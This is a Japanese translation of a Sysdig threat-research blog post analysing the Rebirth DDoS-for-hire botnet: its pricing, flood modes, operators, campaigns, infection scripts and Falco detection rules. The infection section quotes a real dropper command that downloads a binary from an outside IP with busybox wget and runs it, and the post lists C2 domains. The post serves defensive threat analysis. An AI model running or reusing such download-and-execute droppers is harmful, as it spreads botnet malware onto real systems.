DDoS-as-a-Service: The Rebirth Botnet

By 清水 孝郎 - MAY 29, 2024

SHARE:

本文の内容は、2024年5月28日に Sysdig Threat Research Team が投稿したブログ(https://sysdig.com/blog/ddos-as-a-service-the-rebirth-botnet/)を元に日本語に翻訳・再構成した内容となっております。

2024年3月、Sysdig脅威リサーチチーム(TRT)は、ドメイン “rebirthltd[.]com” からHadoopハニーポットサービスの1つに対する攻撃の観測を開始しました。調査の結果、このドメインは成熟し、ますます人気が高まっているDDoS -as-a-Serviceボットネットに関連していることがわかりました。このサービスはMiraiマルウェアファミリーに基づいており、運営者はTelegramとオンラインストア(rebirthltd.mysellix[.]io)を通じてサービスを宣伝しています。ボットネットを運営する脅威アクターは金銭的動機を持っており、主にビデオゲームコミュニティにサービスを宣伝していますが、このボットネットがゲーム関連の目的以外で購入されていないという証拠はなく、組織は依然としてこれらのボットネット攻撃の被害に遭うリスクがある可能性があります。この記事では、ビジネスと技術の観点からこのグループがどのように活動しているかを詳しく見ていきます。 

RebirthLtd

RebirthLtd のビジネスの中核は、料金を支払う意思のある人に貸し出される DDoS ボットネットです。ボットネットの現在の機能は次のとおりです。

 • tcpbypass : Spoofed + raw TCP bypass attack.
• ovhtcp : Spoofed TCP complex flood.
• tcptfo : Spoofed TCP TFO floods.
• handshake : Spoofed + raw handshake connections flood.
• tcpreflect : Spoofed TCP packets reflected attack auto bypass geoblock.
• tcprst : raw TCP RST packets terminate connections.
• udpbypass : udp bypass raw flood.
• socket : socket layer raw + spoof flood.
• gamep : high spoofed + raw packets flood.
• udpflood : raw UDP packets flood.
• ackflood : raw TCP ACK packets flood.
• synflood : raw TCP SYN packets flood.
• wraflood : tcp raw handshake flood.

RebirthLtd は、2022 年 8 月から登録されている Web ベースのストアフロントに掲載されているさまざまなパッケージを通じてサービスを提供しています。購入者がサブスクリプションを購入してすぐにボットネットのサービスにアクセスできる最も安価なプランの価格は 15 ドルです。基本プランには、ボットネットの実行ファイルへのアクセスと、利用可能な感染クライアントの数に関する限定された機能のみが含まれているようです。より高価なプランには、API アクセス、C2 サーバーの可用性、開始できる 1 秒あたりの攻撃数などの改善された機能が含まれています。

再生ボットネット

ボットネットの主なサービスは、金銭的利益を得るためにビデオゲームストリーマーをターゲットにしているようで、Telegram チャンネルでは、RebirthHub (RebirthLtd とともにボットネットの別名) は「ほぼすべての種類のゲームサーバーを攻撃できる」と主張しています。

再生ボットネット

Telegram チャンネルは 2023 年 4 月に作成されましたが、Rebirth ボットネットを宣伝する最初のメッセージは 2024 年 1 月末に投稿されました。数日ごとに定期的な更新が投稿されています。執筆時点では、登録者数は約 200 人でした。

このボットネットは、DDoS 監視 Web サイトtumult.networkによって監視されているようで、おそらくフラッド ターゲットを狙った総リクエスト送信数で 5 番目に多いボットネットとして、トップ 5 ランキングに表示されています。

Tumult は、DDoS サービスにおけるイエロー ページや Craigslist のような役割を果たす新興のリソースです。過去数年間、Mirai のソース コード自体が無料で入手できるなど、悪意のある操作を簡単に設定できるため、このサイトは成長してきました。Imperva の分析によると、複数のボットネット ビルドキット ツールが確認されています。ボットマスターが Rebirth などのサービスで提供できる匿名性によって保護された状態で、感染したデバイスを転貸し、悪意のある操作を実行するために少額の料金を支払うことをいとわない顧客にとって、有利な市場があります。以前はハッキング グループと関係があったボットマスターにとって、これは彼らの技術スキルを違法に収益化することを容易にしました。 

動機

Telegram チャンネルでは、このボットネットは「ほぼすべての種類のゲームサーバーを攻撃できる」と主張しており、Rebirth ボットネット ユーザーのほとんどが金銭的利益を目的としてビデオ ゲーム ストリーマーをターゲットにしていることがわかりました。

ゲーム業界での DDoS 攻撃は、ますます一般的な問題になりつつあるようです。Rebirth などのボットネットを使用すると、個人がゲーム サーバーまたはライブ ゲームの他のプレイヤーに DDoS 攻撃を仕掛け、ゲームに不具合が生じて速度が低下したり、他のプレイヤーの接続が遅延したりクラッシュしたりします。すると、その個人は他のプレイヤーよりも熟練しているように見えます。これは、Twitch などのストリーミング サービスのユーザーにとっては金銭的な動機によるものかもしれません。Twitch のビジネスモデルは、ストリーミングプレイヤーがフォロワーを獲得することに依存しており、基本的には壊れたゲームを収益化することで収入を得ています。

ゲーム DDoS の増加に関する私たちの仮説は、ボットネットの開発と保守を担当する個人に関して収集した調査結果によって裏付けられています。

Rebirth ボットネットの購入者にとってのもう 1 つの使用例は、”DDoS トローリング” です。”ストレッサー トローリング” とも呼ばれるこの現象は、ボットネットを使用してゲーム サーバーに DDoS 攻撃を仕掛けるため、ゲームコミュニティでもかなり広まっています。問題の攻撃は、正当なプレイヤーのゲーム体験を妨害し、サーバーに大量のトラフィックを流してアクセス不能にしたり、深刻な遅延を引き起こしたりすることを目的としています。

帰属

脅威グループのメンバー

RebirthのリーダーはTelegram上で ”CazzG” という人物のようですが、執筆時点ではこのユーザー名はチャンネルのプロフィールには記載されていませんでした。さらに分析を進めると、ユーザー名CazzGは ”estresse.pro” という別のボットネットのサポート管理者兼CEOとして別途記載されていることがわかりました。さらに、このユーザーは中国人である可能性もあります。このチャンネルには、購入についてはCazzGに連絡するよう書かれた中国語の広告がありました。Rebirthチャンネルでも宣伝されているTsukiボットネットのTelegramチャンネルでは、CazzGのユーザー名に中国の国旗が表示されていることもわかりました。最後に、調査中にこの人物の他のニックネームとして ”Elliot” 、”rootkit ty” 、”R00TK” などがあることもわかりました。

stresse.pro ボットネットの Telegram チャンネルはもうアクティブではないようで、最後に投稿されたメッセージはボットネットの実際の販売に関するものでした。

Telegram では ”Docx69” 、TikTokとYouTubeでは ”prixnuke” というユーザー名を持つドイツ語を話す人物も、Rebirthボットネットの管理者および支持者であると私たちは考えています。この人物は、ビデオゲーム ”Call of Duty: Warzone” のストリーミングセッションの動画をTikTokに頻繁にアップロードしており、多くの場合、 ”Nuke Service” は招待者のみのプライベートDiscordサーバー ”shop4youv2” で購入できるという免責事項が付いています。リバースボットネットとの直接的な関連を見つけました。なぜなら、Telegramチャンネルで流通していたYouTube動画で、このボットネットがWarzoneをホストするゲームサーバーにラグを引き起こす可能性があると主張されていたからです。その動画自体はリバースボットネットの広告です。

再生ボットネット
YT「prixnuke」ビデオへのリンク
再生ボットネット
Docx69、 TikTokで「prixnuke」という名前で活動

ドメイン shop4youv2.de は、”Operation PowerOFF” と名付けられたFBIの摘発作戦の一環で、以下に示すように、記事によれば2022年に開始されました。

再生ボットネット

私たちが見つけたELF Digestレポートでは、このドメインが Mirai マルウェアを拡散していると特定されており、その C2 は IPv4 93[.]123[.]85[.]149 でした。AlienVault によると、この IP は、ある時点でドメイン ”tsuki.army” をホストしていました。これは、Rebirth Telegram チャネル内でセカンダリ ボットネットを宣伝するために使用されるドメインです。

マルウェアファミリー

多くのボットネットやマルウェアの亜種と同様に、Rebirth は複数のよく知られたマルウェア ファミリーの集大成です。関連する過去のキャンペーンを調査しているときに、2020 年 5 月のこのツイートを見つけました。そこには、作成者が ”Rebirth” および ”Vulcan” と名付けたマルウェアの詳細な分析が含まれていました。 

2020年11月のVirusTotalの分析によると、このDDoSボットネットのRebirth/VulcanマルウェアファミリーはMiraiではなく、Rebirthという独自のファミリーとして分類されていました。これはGafgytをベースに構築されたボットネットですが、特にIoTデバイスをターゲットに作成されたと説明されています。作成者によると、このマルウェアは既知のファミリーであるQBotとSTDBotからいくつかの機能も継承しており、既知のエクスプロイトも組み込まれています。 

私たちは、これらの古い調査結果が、現在見られる Rebirth DDoS ボットネット攻撃の初期の進化形であると確信しています。2022 年 8 月以前のキャンペーンは、Rebirth のリーダーまたは関連メンバーによるものである可能性が高いのに対し、DDoS-as-a-service ボットネットとしての Rebirth のキャンペーン後の攻撃には、購入者が含まれる可能性があります。

キャンペーン

初期のキャンペーン

2019 年に遡る Rebirth ボットネットの初期調査結果をさらに詳しく調査したところ、現在の RebirthLtd ボットネットが同じものであることを確認する技術的な詳細がいくつか見つかりました。以下のツイートは、”rebirth” という実行可能ファイル名で流通している亜種を示しています。2019 年のファイルは今でもVTで入手可能です。

ツイートのペイロードは、最近のボットネット攻撃から収集した bash スクリプトに似ています。

Twitterからのペイロード
収集されたペイロード

最近のキャンペーン

Rebirth ボットネットは、今年 Telegram で最初の広告が出て以来、かなり活発に活動しています。最近の攻撃は Rebirth の創設者や開発者によるものではなく、ボットネットの機能を購入した他のユーザーによるものである可能性が高くなります。販売やレンタルのケースでは、帰属がかなり複雑になることがあります。

Rebirth ボットネット攻撃は、こちら に見られるように、他のユーザーからも積極的に特定され、報告されています。ただし、rebirthbot[.]icu として特定された C2 は現在停止しています。以前の攻撃では、2024 年 2 月 11 日の Fox_threatintel が、私たちが特定したのと同じ bash スクリプトを含むいくつかの詳細をツイートしました。以下に示すように、このキャンペーンは、上で Rebirth の創設者と関連があると特定した “Stresse.Pro” と関連していました。この攻撃分析のもう 1 つの興味深い点は、”rEAL l33t hxors” と呼ばれる APT グループとの相関関係ですが、これについては、これ以上の証拠は見つかっていません。

再生ボットネット

また、Rebirth ボットネットに関連する他の 3 つのドメインからもハニーポットへの攻撃を受けました。

  • Yoshiproxy[.]ltd
  • Yosh[.]ltd
  • yoshservices[.]ltd


ドメイン ”yosh.ltd” が2023年9月にRebirth攻撃を実行した証拠を発見しました。そして、トリアージ中に、関連ドメイン ”blkyosh.com “ を発見しました。VirusTotalのテレメトリによると、これらの攻撃はスペイン、米国、アイルランド、ドイツなど多くの国ですでに検出されています。

感染方法

悪意のある ELF は、すべてのキャンペーンで同じコードを持つ bash スクリプトをダウンロードして実行することで、ターゲット システム上に拡散します。ファイル名と実行可能ファイルは、キャンペーンまたは悪用された特定の脆弱性に応じて変更されます。たとえば、収集したスクリプトの 1 つは、ある時点でCVE-2023-25717に対して脆弱であった Ruckus Wireless Admin ソフトウェアにちなんで命名されています。命名規則は、特定のボットが脆弱なサービスに従って、または単にアーキテクチャーの互換性のためにデプロイされる、特定のターゲットシステムに対するマルウェアの互換性に対応していると考えられます。たとえば、以下のケースでは、攻撃者は脆弱な Ruckus ソフトウェアを見つけると、特定の互換性のあるボットネットの亜種をデプロイします。

スクリプトは同じ構造になっています:

  • それは、/tmp、/var/run、/mnt、/rootなどの複数の場所にディレクトリを変更(cd)しようとします。これは、おそらく一時ファイルやシステムファイルが保存されている一般的なディレクトリに移動する試みです。
  • 次に、wgetを使用してリモートサーバーから複数のファイルをダウンロードしようとします。これらのファイルには、rebirth.mips、rebirth.mpsl、rebirth.sh4などの名前が付けられています。
  • 各ファイルをダウンロードした後、実行権限を設定(chmod +x)し、実行します(./ファイル名)。これらのファイルは実行後に削除されます(rm -rf)。

bash スクリプトの 2 番目の亜種は、次のコマンドを使用して、ELF ファイルの悪意のある取得と実行を busybox にパイプします。

cd /usr; rm -rf mpsl ; /bin/busybox wget http://194.169.175.43/mpsl; chmod 777 mpsl ; ./mpsl lillin; cd /usr; rmCode language: JavaScript (javascript)

これは、多くの busybox 組み込みコマンドを利用して検出リスクを最小限に抑えることを目的とした、最近導入されたものである可能性があります。この発見は、ターゲットが busybox スイートを実行しているかどうかに応じてペイロードが異なるという、私たちが見つけたRebirth の以前の証拠も裏付けています。執筆時点で、私たちは 11 個の bash スクリプトを収集しており、こちらから入手できます。

武器ツール

私たちは、攻撃者がキャンペーンに従ってバンドルし、プレフィックスを入力して実行する 137 個の Rebirth 実行ファイルを取得することができました (たとえば、元の ELFarm4 “ は ” l1arm4 “、”k1arm4” というラベルが付けられています)。 

それらのいくつかは VirusTotal で検出されず、調査前に提出されていませんでした。執筆時点で、検出されていない亜種が 90 個見つかりました。それらの IoC のリストは、こちら でご覧いただけます。

動的解析

収集した未検出の亜種のランダムサンプルを実行したところ、これらの亜種は以前に記録されたGafgytのサンプルと似ていることが確認できました。これは、プロセス名を/bin/bashにマスクするためにprctlシステムコールを使用するなどの方法に依存していることから明らかです。

特にこれらのサンプルはすべて、”RebirthLTD” をエコーし​​て実行を終了します。

興味深いことに、実行可能ファイルは、たとえば “$1” や ”ntel.” などの特定の起動コマンドで設定されています。それ以外の場合は、同じ操作を実行しないようです。

再生ボットネット

オプションの引数は、リモートコントロールやコマンドインジェクションのメカニズムとして機能する可能性があります。攻撃者はこの機能を使用して、感染したデバイスにリモートでコマンドを発行し、特定のアクションを実行したり、追加のペイロードをダウンロードして実行したりすることができます。また、攻撃者が実行プロセスにランダム性や変動性を組み込んでいるため、マルウェアの動作が予測しにくくなり、分析が難しくなる可能性もあります。したがって、特定の ELF の正しい引数を含む初期ペイロード (bash スクリプト) を完全に取得していなければ、マルウェアの動作をキャプチャできなかった可能性があります。

Sysdig キャプチャーを調査したところ、次のことがわかりました:

このマルウェアは、/proc/net/tcpファイルに対して大量の読み取り操作を1バイトずつ行います。tcpファイルは、ホスト上のアクティブなネットワーク接続に関する情報を提供します。リバースは、おそらく/proc/net/tcpや類似のファイルを読み取ることで、さらなる脆弱なデバイスをスキャンし、開いているポートや感染の潜在的なターゲットを特定しようとしていると考えられます。

次に、特定のポート ” 8345“ のローカル アドレスにソケットを作成してバインドします。これは、プログラムがネットワークリスナーを設定していることを示しています。Rebirth の場合、これはマルウェアが攻撃者からのコマンドを受信したり、ボットネット内の他の感染デバイスと連携したりするためにコマンド アンド コントロール サーバーを設定している可能性があります。

この亜種は、アドレスの再利用を可能にして迅速な伝播と検出の回避を容易にするなど、ネットワーク接続の動作を操作するためのソケットオプションも設定します。

次に、フォークを作成して実行を終了します。この場合、脆弱なデバイスのスキャンや分散型サービス拒否 (DDoS) 攻撃の開始などの悪意のある操作をさらに実行します。

検出

prctlシステムコールは、プロセスの動作のさまざまな側面を制御するために一般的に使用されます。特定のオプションであるPR_SET_NAMEを使用すると、デバッグ目的でプロセスに名前を割り当てることができます。しかし、この機能は悪意のある攻撃者によって、プロセスの本質を隠したり、正当なプロセスになりすますために悪用されることがあります。私たちが観察したリバースマルウェアでも同様です。私たちの場合、prctlシステムコールは、プロセス名を/bin/bashに設定するために使用され、セキュリティツールによる検出を回避していました。

再生ボットネット

このシステムコールはさまざまなツールで利用されるため、 /tmpなどの疑わしい場所から実行されるプログラムに限定した例を示します。Falco は、カスタムルールと、実行時に Rebirth の実行開始を検出できるデフォルトルールを使用して、実行時の Rebirth の使用を検出するために使用できますが、検出を改善したい場合は、ルールを変更したり、新しいルールを作成したりすることもできます。

- rule: Suspicious Process Impersonation
  desc: Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign.
  condition: evt.type=prctl and evt.dir=< and evt.arg.option="PR_SET_NAME" and (proc.exepath contains "/tmp" or proc.exepath contains "/shm")
  exceptions:
  outputs: Process invoked name change from suspicious location (proc.exepath=%proc.exepath evt.args=%evt.args proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline user.name=%user.name user.loginuid=%user.loginuid proc.tty=%proc.tty proc.cmdline=%proc.cmdline proc.pcmdline=%proc.pcmdline gcmdline=%proc.acmdline[2] container.id=%container.id container_name=%container.name proc.pid=%proc.pid proc.cwd=%proc.cwd image=%container.image.repository:%container.image.tag evt.args=%evt.args)
  priority: WARNING
  tags: [host, container, process]Code language: HTML, XML (xml)

Rebirth やその他の Linux マルウェアは、多くの場合、” /tmp” ディレクトリから実行されます。このディレクトリはメモリにバックアップされており、ハード ドライブには保存されていないため、フォレンジックによる発見が困難です。一時ディレクトリからの実行はすべて確認する必要があります。 

- rule: Execution from /tmp
  desc: This rule detects file execution from the /tmp directory, a common tactic for threat actors to stash their readable+writable+executable files.
  condition: spawned_process and (proc.exepath startswith "/tmp/" or (proc.name in (shell_binaries) and proc.args startswith "/tmp/")) and not pip_venv_tmp 
  exceptions:
  output: File execution detected from /tmp by process %proc.name with parent %proc.pname on %container.name under user %user.name with cmdline %proc.cmdline (proc.cmdline=%proc.cmdline connection=%fd.name user.name=%user.name proc.name=%proc.name proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] user.loginuid=%user.loginuid container.id=%container.id evt.type=%evt.type evt.res=%evt.res proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid proc.exepath=%proc.exepath user.uid=%user.uid user.loginname=%user.loginname group.gid=%group.gid group.name=%group.name container.name=%container.name image=%container.image.repository)
  priority: WARNINGCode language: JavaScript (javascript)

まとめ

2017年に公開されたMiraiのソースコードと暗号通貨の登場は、サービス妨害(DoS)サービスを提供するボットネットに関する新しい産業を生み出しました。リバースは、このビジネスモデルが商業的により洗練され、現在のCVE(共通脆弱性識別子)のブームを活用しながら進化し続けていることを示しています。

ユーザーの動機に関わらず、これらのサービスはすべてのネットワークに対する脅威を引き続きもたらし、適切なセキュリティ対策の必要性を示唆します。組織がこれらのボットネットの一部になることは、パフォーマンスの低下、コストの増加、そして場合によっては評判の損失につながる可能性があります。リバースボットネットによるDDoS攻撃などの脅威に対処するためには、プロアクティブな脆弱性管理とリアルタイムのランタイム脅威検出が効果的な方法です。